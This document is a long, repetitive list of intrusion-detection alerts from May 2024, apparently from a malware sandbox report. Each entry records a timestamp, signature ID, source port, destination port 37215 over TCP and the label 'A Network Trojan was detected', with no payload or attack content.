                Timestamp:05/29/24-15:15:14.326112
                SID:2835222
                Source Port:48194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784478
                SID:2835222
                Source Port:57548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983230
                SID:2829579
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165130
                SID:2835222
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711239
                SID:2829579
                Source Port:45696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586188
                SID:2829579
                Source Port:55126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286639
                SID:2835222
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770426
                SID:2835222
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949494
                SID:2835222
                Source Port:42198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236850
                SID:2829579
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990112
                SID:2835222
                Source Port:49580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139662
                SID:2835222
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524568
                SID:2835222
                Source Port:51810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618822
                SID:2829579
                Source Port:40576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840928
                SID:2835222
                Source Port:52110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556933
                SID:2829579
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445256
                SID:2829579
                Source Port:49726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904145
                SID:2829579
                Source Port:40250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664396
                SID:2835222
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066666
                SID:2835222
                Source Port:54666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810908
                SID:2829579
                Source Port:54480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039335
                SID:2835222
                Source Port:35738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669576
                SID:2835222
                Source Port:38328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560842
                SID:2835222
                Source Port:59252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962711
                SID:2835222
                Source Port:35026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849060
                SID:2829579
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801391
                SID:2835222
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444724
                SID:2835222
                Source Port:52874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839536
                SID:2829579
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815879
                SID:2835222
                Source Port:54178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461527
                SID:2829579
                Source Port:48384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719550
                SID:2829579
                Source Port:42760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957465
                SID:2835222
                Source Port:46650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263848
                SID:2829579
                Source Port:58510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165215
                SID:2835222
                Source Port:52144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910279
                SID:2829579
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442641
                SID:2835222
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765280
                SID:2829579
                Source Port:58364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087826
                SID:2835222
                Source Port:54284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666707
                SID:2829579
                Source Port:46268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042460
                SID:2835222
                Source Port:59080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227414
                SID:2829579
                Source Port:42066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949623
                SID:2829579
                Source Port:53658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276639
                SID:2835222
                Source Port:58394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517377
                SID:2835222
                Source Port:33140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710882
                SID:2829579
                Source Port:37324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712695
                SID:2835222
                Source Port:54678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364262
                SID:2829579
                Source Port:52646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228649
                SID:2829579
                Source Port:40638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809902
                SID:2829579
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722421
                SID:2829579
                Source Port:53412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518993
                SID:2835222
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726305
                SID:2835222
                Source Port:50000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779585
                SID:2829579
                Source Port:44462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225507
                SID:2835222
                Source Port:51278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241035
                SID:2829579
                Source Port:45578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943890
                SID:2835222
                Source Port:55050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039746
                SID:2829579
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174864
                SID:2835222
                Source Port:34652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391699
                SID:2829579
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726992
                SID:2835222
                Source Port:55054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740309
                SID:2835222
                Source Port:48258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472036
                SID:2829579
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170639
                SID:2829579
                Source Port:56222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773052
                SID:2835222
                Source Port:58984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422119
                SID:2835222
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911797
                SID:2829579
                Source Port:45252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032493
                SID:2835222
                Source Port:45002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464748
                SID:2829579
                Source Port:35492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960442
                SID:2835222
                Source Port:55620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335481
                SID:2829579
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112939
                SID:2835222
                Source Port:41620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068218
                SID:2835222
                Source Port:32904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785548
                SID:2829579
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586851
                SID:2835222
                Source Port:58102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943195
                SID:2835222
                Source Port:49538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369837
                SID:2829579
                Source Port:60962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970919
                SID:2835222
                Source Port:45518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215650
                SID:2835222
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859676
                SID:2835222
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975367
                SID:2829579
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265632
                SID:2829579
                Source Port:33710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.277532
                SID:2835222
                Source Port:41110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843332
                SID:2829579
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559893
                SID:2835222
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614337
                SID:2835222
                Source Port:40698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782117
                SID:2835222
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215297
                SID:2835222
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896985
                SID:2835222
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965443
                SID:2829579
                Source Port:35632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883165
                SID:2835222
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819020
                SID:2835222
                Source Port:53846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597557
                SID:2835222
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845469
                SID:2829579
                Source Port:35786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461797
                SID:2835222
                Source Port:47478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381079
                SID:2835222
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230991
                SID:2829579
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965844
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321700
                SID:2829579
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868438
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317851
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141338
                SID:2829579
                Source Port:36800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111628
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842429
                SID:2829579
                Source Port:42548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989028
                SID:2829579
                Source Port:52926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027907
                SID:2829579
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212012
                SID:2835222
                Source Port:57478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972737
                SID:2829579
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845397
                SID:2829579
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176961
                SID:2835222
                Source Port:38534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814522
                SID:2829579
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820982
                SID:2829579
                Source Port:59088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831183
                SID:2829579
                Source Port:50054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2829579
                Source Port:48868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988802
                SID:2835222
                Source Port:44236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899535
                SID:2835222
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436181
                SID:2829579
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694037
                SID:2829579
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859939
                SID:2829579
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559707
                SID:2829579
                Source Port:49322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.932614
                SID:2829579
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596794
                SID:2835222
                Source Port:58508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416807
                SID:2835222
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378606
                SID:2829579
                Source Port:49446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457923
                SID:2835222
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726285
                SID:2835222
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521750
                SID:2829579
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532314
                SID:2835222
                Source Port:36970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986467
                SID:2829579
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557774
                SID:2835222
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742631
                SID:2835222
                Source Port:48984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564876
                SID:2829579
                Source Port:34816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978170
                SID:2835222
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631191
                SID:2829579
                Source Port:34986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860294
                SID:2835222
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385339
                SID:2829579
                Source Port:49308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166571
                SID:2835222
                Source Port:52416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237323
                SID:2835222
                Source Port:39902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561999
                SID:2829579
                Source Port:60674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975185
                SID:2829579
                Source Port:36762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266187
                SID:2829579
                Source Port:46184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266353
                SID:2829579
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437218
                SID:2829579
                Source Port:59012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284835
                SID:2835222
                Source Port:54784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856060
                SID:2829579
                Source Port:54332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742721
                SID:2835222
                Source Port:37908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807631
                SID:2835222
                Source Port:40672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871895
                SID:2829579
                Source Port:45882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912431
                SID:2829579
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224055
                SID:2835222
                Source Port:32850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915732
                SID:2829579
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168619
                SID:2835222
                Source Port:49408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655777
                SID:2835222
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547567
                SID:2829579
                Source Port:59620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856845
                SID:2835222
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616284
                SID:2829579
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088011
                SID:2829579
                Source Port:33402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583243
                SID:2829579
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931288
                SID:2829579
                Source Port:36336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815440
                SID:2835222
                Source Port:35116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277028
                SID:2835222
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461342
                SID:2835222
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655080
                SID:2835222
                Source Port:46578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778395
                SID:2835222
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893225
                SID:2835222
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730570
                SID:2835222
                Source Port:50126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965525
                SID:2829579
                Source Port:50702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848471
                SID:2835222
                Source Port:46048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217080
                SID:2835222
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564803
                SID:2835222
                Source Port:54692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558530
                SID:2829579
                Source Port:47760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074935
                SID:2829579
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944623
                SID:2835222
                Source Port:56436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585056
                SID:2835222
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2835222
                Source Port:46850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645076
                SID:2829579
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364622
                SID:2835222
                Source Port:40140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598205
                SID:2829579
                Source Port:57030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860251
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335095
                SID:2835222
                Source Port:34664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649934
                SID:2829579
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854503
                SID:2829579
                Source Port:57854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184333
                SID:2829579
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287477
                SID:2829579
                Source Port:49368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982219
                SID:2829579
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028037
                SID:2829579
                Source Port:47980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784974
                SID:2835222
                Source Port:60118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278798
                SID:2829579
                Source Port:52662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817394
                SID:2829579
                Source Port:47582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009301
                SID:2835222
                Source Port:60920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614795
                SID:2835222
                Source Port:58530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711700
                SID:2829579
                Source Port:36540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517721
                SID:2835222
                Source Port:49122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036788
                SID:2835222
                Source Port:42576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523902
                SID:2835222
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531998
                SID:2835222
                Source Port:35818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228777
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420292
